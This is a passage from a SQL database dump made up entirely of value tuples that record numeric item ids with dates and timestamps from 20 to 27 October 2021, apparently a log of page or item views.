04:19:20'),(36684,1770,1,'2021-10-20','2021-10-20 04:19:23'),(36685,1722,1,'2021-10-20','2021-10-20 04:40:48'),(36686,1722,1,'2021-10-20','2021-10-20 04:40:54'),(36687,487,1,'2021-10-20','2021-10-20 04:58:41'),(36688,1606,1,'2021-10-20','2021-10-20 04:59:03'),(36689,3090,1,'2021-10-20','2021-10-20 05:43:38'),(36690,2904,1,'2021-10-20','2021-10-20 05:44:24'),(36691,3313,1,'2021-10-20','2021-10-20 05:52:32'),(36692,2704,1,'2021-10-20','2021-10-20 07:46:23'),(36693,2309,1,'2021-10-20','2021-10-20 08:49:02'),(36694,1600,1,'2021-10-20','2021-10-20 09:23:16'),(36695,3030,1,'2021-10-20','2021-10-20 09:37:02'),(36696,1612,1,'2021-10-20','2021-10-20 11:27:18'),(36697,2503,1,'2021-10-20','2021-10-20 11:57:04'),(36698,3030,1,'2021-10-20','2021-10-20 12:48:28'),(36699,3030,1,'2021-10-20','2021-10-20 13:18:52'),(36700,89,1,'2021-10-20','2021-10-20 13:34:58'),(36701,72,1,'2021-10-20','2021-10-20 14:03:49'),(36702,3313,1,'2021-10-20','2021-10-20 14:05:36'),(36703,1596,1,'2021-10-20','2021-10-20 14:27:19'),(36704,2457,1,'2021-10-20','2021-10-20 14:37:37'),(36705,3030,1,'2021-10-20','2021-10-20 14:52:03'),(36706,3030,1,'2021-10-20','2021-10-20 14:52:25'),(36707,3030,1,'2021-10-20','2021-10-20 14:52:39'),(36708,1612,1,'2021-10-20','2021-10-20 15:16:51'),(36709,3087,1,'2021-10-20','2021-10-20 15:34:05'),(36710,3087,1,'2021-10-20','2021-10-20 15:36:52'),(36711,4238,1,'2021-10-20','2021-10-20 15:50:03'),(36712,3087,1,'2021-10-20','2021-10-20 16:01:03'),(36713,1745,1,'2021-10-20','2021-10-20 16:20:48'),(36714,2457,1,'2021-10-20','2021-10-20 16:25:43'),(36715,1741,1,'2021-10-20','2021-10-20 17:48:59'),(36716,4238,1,'2021-10-20','2021-10-20 18:05:58'),(36717,3261,1,'2021-10-20','2021-10-20 18:11:55'),(36718,484,1,'2021-10-20','2021-10-20 18:21:11'),(36719,3087,1,'2021-10-20','2021-10-20 18:47:26'),(36720,1608,1,'2021-10-20','2021-10-20 19:28:18'),(36721,1586,1,'2021-10-20','2021-10-20 19:37:32'),(36722,4440,1,'2021-10-20','2021-10-20 19:45:11'),(36723,3261,1,'2021-10-20','2021-10-20 19:55:44'),(36724,1724,1,'2021-10-20','2021-10-20 19:58:56'),(36725,3005,1,'2021-10-20','2021-10-20 20:17:30'),(36726,1745,1,'2021-10-20','2021-10-20 20:40:11'),(36727,1582,1,'2021-10-20','2021-10-20 21:17:18'),(36728,3257,1,'2021-10-20','2021-10-20 21:25:27'),(36729,1544,1,'2021-10-20','2021-10-20 21:26:48'),(36730,478,1,'2021-10-20','2021-10-20 21:48:05'),(36731,91,1,'2021-10-20','2021-10-20 21:51:49'),(36732,4444,1,'2021-10-20','2021-10-20 21:58:41'),(36733,3313,1,'2021-10-20','2021-10-20 22:24:07'),(36734,4444,1,'2021-10-20','2021-10-20 22:57:06'),(36735,91,1,'2021-10-20','2021-10-20 22:57:10'),(36736,72,1,'2021-10-20','2021-10-20 23:01:39'),(36737,4238,1,'2021-10-20','2021-10-20 23:08:20'),(36738,3107,1,'2021-10-20','2021-10-20 23:19:28'),(36739,2410,1,'2021-10-20','2021-10-20 23:27:24'),(36740,2457,1,'2021-10-21','2021-10-21 00:25:11'),(36741,4457,1,'2021-10-21','2021-10-21 01:26:00'),(36742,2309,1,'2021-10-21','2021-10-21 02:20:33'),(36743,2309,1,'2021-10-21','2021-10-21 02:27:49'),(36744,2309,1,'2021-10-21','2021-10-21 02:29:14'),(36745,1582,1,'2021-10-21','2021-10-21 03:18:10'),(36746,2309,1,'2021-10-21','2021-10-21 05:05:11'),(36747,1724,1,'2021-10-21','2021-10-21 05:09:13'),(36748,3253,1,'2021-10-21','2021-10-21 05:45:59'),(36749,1586,1,'2021-10-21','2021-10-21 05:57:02'),(36750,4396,1,'2021-10-21','2021-10-21 06:40:56'),(36751,2309,1,'2021-10-21','2021-10-21 07:39:01'),(36752,3030,1,'2021-10-21','2021-10-21 08:28:05'),(36753,469,1,'2021-10-21','2021-10-21 08:42:59'),(36754,1582,1,'2021-10-21','2021-10-21 08:44:06'),(36755,1582,1,'2021-10-21','2021-10-21 09:01:13'),(36756,3030,1,'2021-10-21','2021-10-21 09:26:50'),(36757,3034,1,'2021-10-21','2021-10-21 09:29:48'),(36758,4341,1,'2021-10-21','2021-10-21 09:33:37'),(36759,1602,1,'2021-10-21','2021-10-21 09:43:57'),(36760,1602,1,'2021-10-21','2021-10-21 09:43:59'),(36761,1608,1,'2021-10-21','2021-10-21 09:45:21'),(36762,2457,1,'2021-10-21','2021-10-21 09:45:51'),(36763,1544,1,'2021-10-21','2021-10-21 09:47:42'),(36764,1544,1,'2021-10-21','2021-10-21 09:47:53'),(36765,1602,1,'2021-10-21','2021-10-21 09:48:31'),(36766,2558,1,'2021-10-21','2021-10-21 09:50:37'),(36767,1606,1,'2021-10-21','2021-10-21 10:00:50'),(36768,80,1,'2021-10-21','2021-10-21 10:00:57'),(36769,1602,1,'2021-10-21','2021-10-21 10:01:58'),(36770,4301,1,'2021-10-21','2021-10-21 10:20:41'),(36771,2148,1,'2021-10-21','2021-10-21 10:30:05'),(36772,4457,1,'2021-10-21','2021-10-21 10:40:43'),(36773,4457,1,'2021-10-21','2021-10-21 10:50:29'),(36774,2609,1,'2021-10-21','2021-10-21 14:09:42'),(36775,2609,1,'2021-10-21','2021-10-21 14:09:52'),(36776,2609,1,'2021-10-21','2021-10-21 14:10:03'),(36777,2457,1,'2021-10-21','2021-10-21 14:15:42'),(36778,80,1,'2021-10-21','2021-10-21 14:20:28'),(36779,80,1,'2021-10-21','2021-10-21 14:21:43'),(36780,472,1,'2021-10-21','2021-10-21 14:25:51'),(36781,472,1,'2021-10-21','2021-10-21 14:25:53'),(36782,1606,1,'2021-10-21','2021-10-21 14:35:18'),(36783,80,1,'2021-10-21','2021-10-21 14:35:36'),(36784,91,1,'2021-10-21','2021-10-21 14:37:41'),(36785,3764,1,'2021-10-21','2021-10-21 15:03:21'),(36786,1586,1,'2021-10-21','2021-10-21 15:10:51'),(36787,3706,1,'2021-10-21','2021-10-21 15:24:05'),(36788,3482,1,'2021-10-21','2021-10-21 15:40:14'),(36789,1602,1,'2021-10-21','2021-10-21 15:45:56'),(36790,1544,1,'2021-10-21','2021-10-21 15:49:01'),(36791,1612,1,'2021-10-21','2021-10-21 15:50:00'),(36792,68,1,'2021-10-21','2021-10-21 16:10:58'),(36793,1602,1,'2021-10-21','2021-10-21 16:13:49'),(36794,72,1,'2021-10-21','2021-10-21 16:19:58'),(36795,2159,1,'2021-10-21','2021-10-21 16:31:49'),(36796,1602,1,'2021-10-21','2021-10-21 16:32:19'),(36797,2457,1,'2021-10-21','2021-10-21 17:21:33'),(36798,4341,1,'2021-10-21','2021-10-21 17:36:37'),(36799,2410,1,'2021-10-21','2021-10-21 17:51:21'),(36800,1582,1,'2021-10-21','2021-10-21 17:51:34'),(36801,91,1,'2021-10-21','2021-10-21 17:55:03'),(36802,4448,1,'2021-10-21','2021-10-21 17:56:24'),(36803,4448,1,'2021-10-21','2021-10-21 17:56:26'),(36804,4448,1,'2021-10-21','2021-10-21 18:03:44'),(36805,4444,1,'2021-10-21','2021-10-21 18:05:19'),(36806,4440,1,'2021-10-21','2021-10-21 18:09:20'),(36807,4424,1,'2021-10-21','2021-10-21 18:10:30'),(36808,2609,1,'2021-10-21','2021-10-21 18:11:44'),(36809,2178,1,'2021-10-21','2021-10-21 18:12:21'),(36810,2165,1,'2021-10-21','2021-10-21 18:14:29'),(36811,2161,1,'2021-10-21','2021-10-21 18:15:51'),(36812,3030,1,'2021-10-21','2021-10-21 18:17:12'),(36813,2165,1,'2021-10-21','2021-10-21 18:17:36'),(36814,2609,1,'2021-10-21','2021-10-21 18:18:08'),(36815,4440,1,'2021-10-21','2021-10-21 18:19:33'),(36816,4448,1,'2021-10-21','2021-10-21 18:21:04'),(36817,4444,1,'2021-10-21','2021-10-21 18:22:56'),(36818,3030,1,'2021-10-21','2021-10-21 18:45:37'),(36819,1606,1,'2021-10-21','2021-10-21 19:02:35'),(36820,2503,1,'2021-10-21','2021-10-21 19:04:40'),(36821,2309,1,'2021-10-21','2021-10-21 19:15:36'),(36822,4238,1,'2021-10-21','2021-10-21 19:40:35'),(36823,4448,1,'2021-10-21','2021-10-21 19:42:52'),(36824,3087,1,'2021-10-21','2021-10-21 19:47:17'),(36825,3430,1,'2021-10-21','2021-10-21 19:49:15'),(36826,3030,1,'2021-10-21','2021-10-21 20:05:49'),(36827,3030,1,'2021-10-21','2021-10-21 20:07:18'),(36828,472,1,'2021-10-21','2021-10-21 20:15:38'),(36829,87,1,'2021-10-21','2021-10-21 20:38:06'),(36830,89,1,'2021-10-21','2021-10-21 20:38:43'),(36831,89,1,'2021-10-21','2021-10-21 20:39:12'),(36832,89,1,'2021-10-21','2021-10-21 20:39:24'),(36833,89,1,'2021-10-21','2021-10-21 20:43:19'),(36834,91,1,'2021-10-21','2021-10-21 20:43:54'),(36835,1606,1,'2021-10-21','2021-10-21 20:44:17'),(36836,3257,1,'2021-10-21','2021-10-21 20:45:35'),(36837,472,1,'2021-10-21','2021-10-21 21:15:38'),(36838,1612,1,'2021-10-21','2021-10-21 22:02:39'),(36839,2457,1,'2021-10-21','2021-10-21 23:15:38'),(36840,3257,1,'2021-10-22','2021-10-22 00:20:40'),(36841,1770,1,'2021-10-22','2021-10-22 00:32:30'),(36842,108,1,'2021-10-22','2021-10-22 01:02:45'),(36843,4457,1,'2021-10-22','2021-10-22 02:10:36'),(36844,469,1,'2021-10-22','2021-10-22 03:09:17'),(36845,1606,1,'2021-10-22','2021-10-22 03:51:29'),(36846,469,1,'2021-10-22','2021-10-22 03:53:21'),(36847,1544,1,'2021-10-22','2021-10-22 04:37:32'),(36848,4238,1,'2021-10-22','2021-10-22 05:18:38'),(36849,76,1,'2021-10-22','2021-10-22 05:23:10'),(36850,91,1,'2021-10-22','2021-10-22 05:23:33'),(36851,91,1,'2021-10-22','2021-10-22 05:25:33'),(36852,108,1,'2021-10-22','2021-10-22 06:11:38'),(36853,1770,1,'2021-10-22','2021-10-22 06:16:48'),(36854,1588,1,'2021-10-22','2021-10-22 06:42:24'),(36855,2769,1,'2021-10-22','2021-10-22 06:53:06'),(36856,1592,1,'2021-10-22','2021-10-22 07:05:07'),(36857,4341,1,'2021-10-22','2021-10-22 07:25:59'),(36858,72,1,'2021-10-22','2021-10-22 07:29:04'),(36859,4238,1,'2021-10-22','2021-10-22 07:37:16'),(36860,1602,1,'2021-10-22','2021-10-22 08:19:54'),(36861,1602,1,'2021-10-22','2021-10-22 08:20:23'),(36862,4457,1,'2021-10-22','2021-10-22 09:09:07'),(36863,3030,1,'2021-10-22','2021-10-22 09:57:31'),(36864,3030,1,'2021-10-22','2021-10-22 09:58:10'),(36865,1598,1,'2021-10-22','2021-10-22 10:06:20'),(36866,1612,1,'2021-10-22','2021-10-22 10:24:39'),(36867,80,1,'2021-10-22','2021-10-22 10:33:14'),(36868,87,1,'2021-10-22','2021-10-22 10:48:35'),(36869,68,1,'2021-10-22','2021-10-22 10:48:57'),(36870,1612,1,'2021-10-22','2021-10-22 10:51:06'),(36871,89,1,'2021-10-22','2021-10-22 11:03:57'),(36872,2063,1,'2021-10-22','2021-10-22 11:05:52'),(36873,2063,1,'2021-10-22','2021-10-22 11:06:10'),(36874,487,1,'2021-10-22','2021-10-22 11:07:02'),(36875,487,1,'2021-10-22','2021-10-22 11:07:25'),(36876,89,1,'2021-10-22','2021-10-22 11:07:48'),(36877,89,1,'2021-10-22','2021-10-22 11:08:07'),(36878,1586,1,'2021-10-22','2021-10-22 11:08:07'),(36879,1600,1,'2021-10-22','2021-10-22 11:08:41'),(36880,89,1,'2021-10-22','2021-10-22 11:09:55'),(36881,87,1,'2021-10-22','2021-10-22 11:10:57'),(36882,91,1,'2021-10-22','2021-10-22 11:11:11'),(36883,89,1,'2021-10-22','2021-10-22 11:11:47'),(36884,4454,1,'2021-10-22','2021-10-22 11:12:29'),(36885,3030,1,'2021-10-22','2021-10-22 11:53:42'),(36886,2904,1,'2021-10-22','2021-10-22 11:54:44'),(36887,2904,1,'2021-10-22','2021-10-22 11:57:02'),(36888,2904,1,'2021-10-22','2021-10-22 11:57:43'),(36889,2904,1,'2021-10-22','2021-10-22 11:58:28'),(36890,2904,1,'2021-10-22','2021-10-22 11:58:55'),(36891,2904,1,'2021-10-22','2021-10-22 11:59:00'),(36892,2904,1,'2021-10-22','2021-10-22 11:59:09'),(36893,3030,1,'2021-10-22','2021-10-22 11:59:16'),(36894,3030,1,'2021-10-22','2021-10-22 11:59:30'),(36895,2904,1,'2021-10-22','2021-10-22 12:00:12'),(36896,1588,1,'2021-10-22','2021-10-22 12:02:54'),(36897,91,1,'2021-10-22','2021-10-22 12:03:24'),(36898,3030,1,'2021-10-22','2021-10-22 12:03:42'),(36899,91,1,'2021-10-22','2021-10-22 12:07:11'),(36900,1594,1,'2021-10-22','2021-10-22 12:36:54'),(36901,76,1,'2021-10-22','2021-10-22 12:37:35'),(36902,72,1,'2021-10-22','2021-10-22 14:23:36'),(36903,91,1,'2021-10-22','2021-10-22 14:38:35'),(36904,1612,1,'2021-10-22','2021-10-22 14:50:25'),(36905,91,1,'2021-10-22','2021-10-22 14:52:44'),(36906,1718,1,'2021-10-22','2021-10-22 14:59:52'),(36907,91,1,'2021-10-22','2021-10-22 15:17:41'),(36908,1588,1,'2021-10-22','2021-10-22 15:52:38'),(36909,1724,1,'2021-10-22','2021-10-22 16:10:48'),(36910,3271,1,'2021-10-22','2021-10-22 16:15:31'),(36911,1726,1,'2021-10-22','2021-10-22 16:24:03'),(36912,2904,1,'2021-10-22','2021-10-22 16:25:37'),(36913,2904,1,'2021-10-22','2021-10-22 16:25:49'),(36914,102,1,'2021-10-22','2021-10-22 16:26:25'),(36915,74,1,'2021-10-22','2021-10-22 16:26:52'),(36916,80,1,'2021-10-22','2021-10-22 16:27:14'),(36917,1588,1,'2021-10-22','2021-10-22 16:36:29'),(36918,3030,1,'2021-10-22','2021-10-22 16:48:13'),(36919,91,1,'2021-10-22','2021-10-22 17:12:39'),(36920,3247,1,'2021-10-22','2021-10-22 17:44:41'),(36921,1598,1,'2021-10-22','2021-10-22 17:55:58'),(36922,3247,1,'2021-10-22','2021-10-22 18:52:11'),(36923,1602,1,'2021-10-22','2021-10-22 19:28:12'),(36924,3724,1,'2021-10-22','2021-10-22 19:54:27'),(36925,3724,1,'2021-10-22','2021-10-22 19:55:56'),(36926,3030,1,'2021-10-22','2021-10-22 19:56:17'),(36927,3724,1,'2021-10-22','2021-10-22 19:59:56'),(36928,80,1,'2021-10-22','2021-10-22 20:31:11'),(36929,1612,1,'2021-10-22','2021-10-22 21:08:42'),(36930,1608,1,'2021-10-22','2021-10-22 21:24:14'),(36931,1598,1,'2021-10-22','2021-10-22 21:31:12'),(36932,2309,1,'2021-10-22','2021-10-22 22:38:43'),(36933,2309,1,'2021-10-22','2021-10-22 22:50:46'),(36934,473,1,'2021-10-22','2021-10-22 23:29:28'),(36935,1588,1,'2021-10-23','2021-10-23 00:09:29'),(36936,4457,1,'2021-10-23','2021-10-23 01:00:38'),(36937,2457,1,'2021-10-23','2021-10-23 02:07:16'),(36938,1588,1,'2021-10-23','2021-10-23 03:09:27'),(36939,1600,1,'2021-10-23','2021-10-23 04:58:50'),(36940,3724,1,'2021-10-23','2021-10-23 05:37:24'),(36941,3724,1,'2021-10-23','2021-10-23 06:21:42'),(36942,3724,1,'2021-10-23','2021-10-23 06:23:13'),(36943,1600,1,'2021-10-23','2021-10-23 06:30:40'),(36944,1608,1,'2021-10-23','2021-10-23 06:45:04'),(36945,108,1,'2021-10-23','2021-10-23 06:45:08'),(36946,72,1,'2021-10-23','2021-10-23 07:08:11'),(36947,2309,1,'2021-10-23','2021-10-23 07:44:28'),(36948,80,1,'2021-10-23','2021-10-23 08:15:27'),(36949,3724,1,'2021-10-23','2021-10-23 08:21:27'),(36950,1699,1,'2021-10-23','2021-10-23 08:21:31'),(36951,1695,1,'2021-10-23','2021-10-23 08:24:06'),(36952,3124,1,'2021-10-23','2021-10-23 09:10:42'),(36953,1606,1,'2021-10-23','2021-10-23 10:21:22'),(36954,4448,1,'2021-10-23','2021-10-23 10:36:05'),(36955,4238,1,'2021-10-23','2021-10-23 11:51:17'),(36956,3030,1,'2021-10-23','2021-10-23 13:28:38'),(36957,1582,1,'2021-10-23','2021-10-23 13:38:22'),(36958,1582,1,'2021-10-23','2021-10-23 13:38:41'),(36959,72,1,'2021-10-23','2021-10-23 14:05:36'),(36960,3764,1,'2021-10-23','2021-10-23 15:36:03'),(36961,1608,1,'2021-10-23','2021-10-23 15:57:24'),(36962,2159,1,'2021-10-23','2021-10-23 15:57:26'),(36963,1600,1,'2021-10-23','2021-10-23 15:57:32'),(36964,1695,1,'2021-10-23','2021-10-23 16:42:21'),(36965,68,1,'2021-10-23','2021-10-23 17:01:27'),(36966,68,1,'2021-10-23','2021-10-23 17:01:45'),(36967,72,1,'2021-10-23','2021-10-23 17:04:14'),(36968,1695,1,'2021-10-23','2021-10-23 17:27:23'),(36969,3045,1,'2021-10-23','2021-10-23 17:28:06'),(36970,2503,1,'2021-10-23','2021-10-23 18:06:34'),(36971,3030,1,'2021-10-23','2021-10-23 18:38:18'),(36972,3030,1,'2021-10-23','2021-10-23 18:39:01'),(36973,468,1,'2021-10-23','2021-10-23 18:39:24'),(36974,3307,1,'2021-10-23','2021-10-23 20:13:05'),(36975,2309,1,'2021-10-23','2021-10-23 20:31:06'),(36976,1612,1,'2021-10-23','2021-10-23 20:49:06'),(36977,4420,1,'2021-10-23','2021-10-23 20:59:38'),(36978,72,1,'2021-10-23','2021-10-23 21:33:43'),(36979,1586,1,'2021-10-23','2021-10-23 22:52:35'),(36980,1582,1,'2021-10-23','2021-10-23 23:16:48'),(36981,2159,1,'2021-10-24','2021-10-24 00:49:49'),(36982,3307,1,'2021-10-24','2021-10-24 00:52:14'),(36983,3664,1,'2021-10-24','2021-10-24 01:34:51'),(36984,1726,1,'2021-10-24','2021-10-24 02:20:14'),(36985,3045,1,'2021-10-24','2021-10-24 02:51:46'),(36986,1872,1,'2021-10-24','2021-10-24 03:36:20'),(36987,72,1,'2021-10-24','2021-10-24 04:32:08'),(36988,2309,1,'2021-10-24','2021-10-24 04:34:33'),(36989,1612,1,'2021-10-24','2021-10-24 04:56:12'),(36990,3030,1,'2021-10-24','2021-10-24 05:21:20'),(36991,1600,1,'2021-10-24','2021-10-24 05:26:46'),(36992,484,1,'2021-10-24','2021-10-24 05:28:14'),(36993,3764,1,'2021-10-24','2021-10-24 05:47:16'),(36994,2813,1,'2021-10-24','2021-10-24 06:03:32'),(36995,1602,1,'2021-10-24','2021-10-24 06:55:51'),(36996,1614,1,'2021-10-24','2021-10-24 07:51:12'),(36997,2159,1,'2021-10-24','2021-10-24 09:49:17'),(36998,2309,1,'2021-10-24','2021-10-24 10:37:15'),(36999,2503,1,'2021-10-24','2021-10-24 11:02:47'),(37000,1544,1,'2021-10-24','2021-10-24 11:09:03'),(37001,91,1,'2021-10-24','2021-10-24 11:09:42'),(37002,68,1,'2021-10-24','2021-10-24 11:10:13'),(37003,91,1,'2021-10-24','2021-10-24 11:10:40'),(37004,2150,1,'2021-10-24','2021-10-24 11:19:16'),(37005,72,1,'2021-10-24','2021-10-24 12:05:02'),(37006,4448,1,'2021-10-24','2021-10-24 12:10:01'),(37007,1724,1,'2021-10-24','2021-10-24 12:33:15'),(37008,2769,1,'2021-10-24','2021-10-24 13:06:14'),(37009,76,1,'2021-10-24','2021-10-24 13:32:46'),(37010,1602,1,'2021-10-24','2021-10-24 13:51:13'),(37011,3727,1,'2021-10-24','2021-10-24 13:52:19'),(37012,3727,1,'2021-10-24','2021-10-24 14:19:58'),(37013,3704,1,'2021-10-24','2021-10-24 15:21:11'),(37014,3030,1,'2021-10-24','2021-10-24 15:34:26'),(37015,2309,1,'2021-10-24','2021-10-24 16:12:40'),(37016,1602,1,'2021-10-24','2021-10-24 16:26:40'),(37017,3034,1,'2021-10-24','2021-10-24 16:38:21'),(37018,80,1,'2021-10-24','2021-10-24 16:44:58'),(37019,2813,1,'2021-10-24','2021-10-24 16:51:11'),(37020,2609,1,'2021-10-24','2021-10-24 17:10:30'),(37021,3034,1,'2021-10-24','2021-10-24 17:16:56'),(37022,3109,1,'2021-10-24','2021-10-24 18:00:38'),(37023,1594,1,'2021-10-24','2021-10-24 18:18:38'),(37024,1588,1,'2021-10-24','2021-10-24 18:36:38'),(37025,3664,1,'2021-10-24','2021-10-24 18:59:38'),(37026,2159,1,'2021-10-24','2021-10-24 19:45:05'),(37027,72,1,'2021-10-24','2021-10-24 19:45:48'),(37028,3069,1,'2021-10-24','2021-10-24 20:25:37'),(37029,2150,1,'2021-10-24','2021-10-24 20:29:37'),(37030,486,1,'2021-10-24','2021-10-24 21:20:43'),(37031,2503,1,'2021-10-24','2021-10-24 22:32:36'),(37032,3430,1,'2021-10-24','2021-10-24 23:12:42'),(37033,3430,1,'2021-10-24','2021-10-24 23:14:25'),(37034,1739,1,'2021-10-25','2021-10-25 00:14:22'),(37035,570,1,'2021-10-25','2021-10-25 00:31:09'),(37036,2609,1,'2021-10-25','2021-10-25 01:36:08'),(37037,1594,1,'2021-10-25','2021-10-25 02:20:46'),(37038,2297,1,'2021-10-25','2021-10-25 02:26:44'),(37039,2609,1,'2021-10-25','2021-10-25 02:43:14'),(37040,2297,1,'2021-10-25','2021-10-25 03:16:35'),(37041,2154,1,'2021-10-25','2021-10-25 03:36:39'),(37042,2154,1,'2021-10-25','2021-10-25 03:56:58'),(37043,1588,1,'2021-10-25','2021-10-25 04:01:51'),(37044,2769,1,'2021-10-25','2021-10-25 04:10:42'),(37045,570,1,'2021-10-25','2021-10-25 04:24:23'),(37046,3109,1,'2021-10-25','2021-10-25 04:39:44'),(37047,1612,1,'2021-10-25','2021-10-25 04:57:39'),(37048,2813,1,'2021-10-25','2021-10-25 05:15:38'),(37049,1582,1,'2021-10-25','2021-10-25 05:28:11'),(37050,87,1,'2021-10-25','2021-10-25 05:28:27'),(37051,1592,1,'2021-10-25','2021-10-25 05:44:15'),(37052,3704,1,'2021-10-25','2021-10-25 05:52:24'),(37053,2297,1,'2021-10-25','2021-10-25 06:18:59'),(37054,2297,1,'2021-10-25','2021-10-25 06:36:58'),(37055,4335,1,'2021-10-25','2021-10-25 07:35:26'),(37056,2297,1,'2021-10-25','2021-10-25 09:18:44'),(37057,2609,1,'2021-10-25','2021-10-25 10:03:46'),(37058,2503,1,'2021-10-25','2021-10-25 10:14:20'),(37059,2165,1,'2021-10-25','2021-10-25 10:29:47'),(37060,2165,1,'2021-10-25','2021-10-25 10:30:30'),(37061,68,1,'2021-10-25','2021-10-25 10:42:10'),(37062,2297,1,'2021-10-25','2021-10-25 11:11:31'),(37063,1722,1,'2021-10-25','2021-10-25 11:32:34'),(37064,1588,1,'2021-10-25','2021-10-25 11:40:23'),(37065,2809,1,'2021-10-25','2021-10-25 11:44:18'),(37066,3092,1,'2021-10-25','2021-10-25 11:58:29'),(37067,1594,1,'2021-10-25','2021-10-25 12:25:32'),(37068,2309,1,'2021-10-25','2021-10-25 12:34:28'),(37069,2911,1,'2021-10-25','2021-10-25 12:40:06'),(37070,2911,1,'2021-10-25','2021-10-25 12:43:10'),(37071,1594,1,'2021-10-25','2021-10-25 12:43:27'),(37072,2503,1,'2021-10-25','2021-10-25 13:12:48'),(37073,68,1,'2021-10-25','2021-10-25 13:17:06'),(37074,1594,1,'2021-10-25','2021-10-25 13:41:11'),(37075,2751,1,'2021-10-25','2021-10-25 13:46:48'),(37076,2751,1,'2021-10-25','2021-10-25 13:47:23'),(37077,1703,1,'2021-10-25','2021-10-25 14:25:16'),(37078,1703,1,'2021-10-25','2021-10-25 14:26:44'),(37079,2457,1,'2021-10-25','2021-10-25 14:27:28'),(37080,2297,1,'2021-10-25','2021-10-25 14:52:03'),(37081,1544,1,'2021-10-25','2021-10-25 14:56:40'),(37082,1592,1,'2021-10-25','2021-10-25 15:07:40'),(37083,3072,1,'2021-10-25','2021-10-25 15:49:29'),(37084,2769,1,'2021-10-25','2021-10-25 16:11:59'),(37085,1699,1,'2021-10-25','2021-10-25 16:34:30'),(37086,3092,1,'2021-10-25','2021-10-25 16:37:29'),(37087,87,1,'2021-10-25','2021-10-25 17:06:42'),(37088,3030,1,'2021-10-25','2021-10-25 17:47:11'),(37089,2503,1,'2021-10-25','2021-10-25 18:08:24'),(37090,2297,1,'2021-10-25','2021-10-25 18:18:25'),(37091,2609,1,'2021-10-25','2021-10-25 18:27:23'),(37092,1582,1,'2021-10-25','2021-10-25 19:18:50'),(37093,72,1,'2021-10-25','2021-10-25 19:33:53'),(37094,3092,1,'2021-10-25','2021-10-25 19:39:34'),(37095,2297,1,'2021-10-25','2021-10-25 19:47:23'),(37096,3430,1,'2021-10-25','2021-10-25 20:12:56'),(37097,3030,1,'2021-10-25','2021-10-25 20:27:30'),(37098,4338,1,'2021-10-25','2021-10-25 20:34:08'),(37099,3127,1,'2021-10-25','2021-10-25 21:04:00'),(37100,3127,1,'2021-10-25','2021-10-25 21:15:28'),(37101,1602,1,'2021-10-25','2021-10-25 22:21:15'),(37102,3710,1,'2021-10-25','2021-10-25 22:29:49'),(37103,72,1,'2021-10-26','2021-10-26 04:05:41'),(37104,2297,1,'2021-10-26','2021-10-26 04:35:14'),(37105,2297,1,'2021-10-26','2021-10-26 04:44:12'),(37106,2297,1,'2021-10-26','2021-10-26 05:56:53'),(37107,2297,1,'2021-10-26','2021-10-26 06:38:10'),(37108,2154,1,'2021-10-26','2021-10-26 08:26:01'),(37109,2297,1,'2021-10-26','2021-10-26 08:55:06'),(37110,80,1,'2021-10-26','2021-10-26 09:03:30'),(37111,89,1,'2021-10-26','2021-10-26 10:23:22'),(37112,2457,1,'2021-10-26','2021-10-26 10:33:47'),(37113,1703,1,'2021-10-26','2021-10-26 10:40:55'),(37114,1703,1,'2021-10-26','2021-10-26 10:40:55'),(37115,72,1,'2021-10-26','2021-10-26 11:01:20'),(37116,1718,1,'2021-10-26','2021-10-26 11:08:12'),(37117,1600,1,'2021-10-26','2021-10-26 11:18:22'),(37118,3257,1,'2021-10-26','2021-10-26 12:17:48'),(37119,76,1,'2021-10-26','2021-10-26 12:17:57'),(37120,76,1,'2021-10-26','2021-10-26 12:31:49'),(37121,3257,1,'2021-10-26','2021-10-26 12:32:10'),(37122,1602,1,'2021-10-26','2021-10-26 14:03:59'),(37123,3030,1,'2021-10-26','2021-10-26 14:50:03'),(37124,1728,1,'2021-10-26','2021-10-26 14:52:02'),(37125,1582,1,'2021-10-26','2021-10-26 14:57:18'),(37126,1582,1,'2021-10-26','2021-10-26 14:58:29'),(37127,1606,1,'2021-10-26','2021-10-26 15:00:41'),(37128,1582,1,'2021-10-26','2021-10-26 15:00:46'),(37129,1586,1,'2021-10-26','2021-10-26 15:17:19'),(37130,473,1,'2021-10-26','2021-10-26 15:19:24'),(37131,4335,1,'2021-10-26','2021-10-26 15:20:48'),(37132,1582,1,'2021-10-26','2021-10-26 16:00:55'),(37133,2297,1,'2021-10-26','2021-10-26 16:16:13'),(37134,3251,1,'2021-10-26','2021-10-26 16:22:27'),(37135,2297,1,'2021-10-26','2021-10-26 17:34:13'),(37136,1604,1,'2021-10-26','2021-10-26 17:49:27'),(37137,1604,1,'2021-10-26','2021-10-26 18:04:27'),(37138,2457,1,'2021-10-26','2021-10-26 18:34:27'),(37139,108,1,'2021-10-26','2021-10-26 18:40:08'),(37140,91,1,'2021-10-26','2021-10-26 18:40:41'),(37141,89,1,'2021-10-26','2021-10-26 18:41:13'),(37142,1586,1,'2021-10-26','2021-10-26 18:41:48'),(37143,4341,1,'2021-10-26','2021-10-26 18:43:40'),(37144,4457,1,'2021-10-26','2021-10-26 18:49:33'),(37145,72,1,'2021-10-26','2021-10-26 19:30:08'),(37146,91,1,'2021-10-26','2021-10-26 21:02:51'),(37147,91,1,'2021-10-26','2021-10-26 21:16:49'),(37148,4338,1,'2021-10-26','2021-10-26 21:17:26'),(37149,4341,1,'2021-10-26','2021-10-26 21:37:16'),(37150,2956,1,'2021-10-26','2021-10-26 21:38:47'),(37151,1604,1,'2021-10-26','2021-10-26 22:10:15'),(37152,2813,1,'2021-10-26','2021-10-26 23:16:55'),(37153,2609,1,'2021-10-26','2021-10-26 23:37:36'),(37154,2154,1,'2021-10-27','2021-10-27 01:06:15'),(37155,72,1,'2021-10-27','2021-10-27 04:30:25'),(37156,1600,1,'2021-10-27','2021-10-27 04:31:09'),(37157,2704,1,'2021-10-27','2021-10-27 04:34:00'),(37158,1610,1,'2021-10-27','2021-10-27 04:49:56'),(37159,2297,1,'2021-10-27','2021-10-27 05:21:13'),(37160,2297,1,'2021-10-27','2021-10-27 05:29:12'),(37161,2457,1,'2021-10-27','2021-10-27 05:36:07'),(37162,2154,1,'2021-10-27','2021-10-27 05:38:54'),(37163,1602,1,'2021-10-27','2021-10-27 06:16:42'),(37164,1606,1,'2021-10-27','2021-10-27 07:59:57'),(37165,84,1,'2021-10-27','2021-10-27 08:16:15'),(37166,68,1,'2021-10-27','2021-10-27 08:17:14'),(37167,84,1,'2021-10-27','2021-10-27 08:31:38'),(37168,76,1,'2021-10-27','2021-10-27 08:31:45'),(37169,84,1,'2021-10-27','2021-10-27 08:34:37'),(37170,89,1,'2021-10-27','2021-10-27 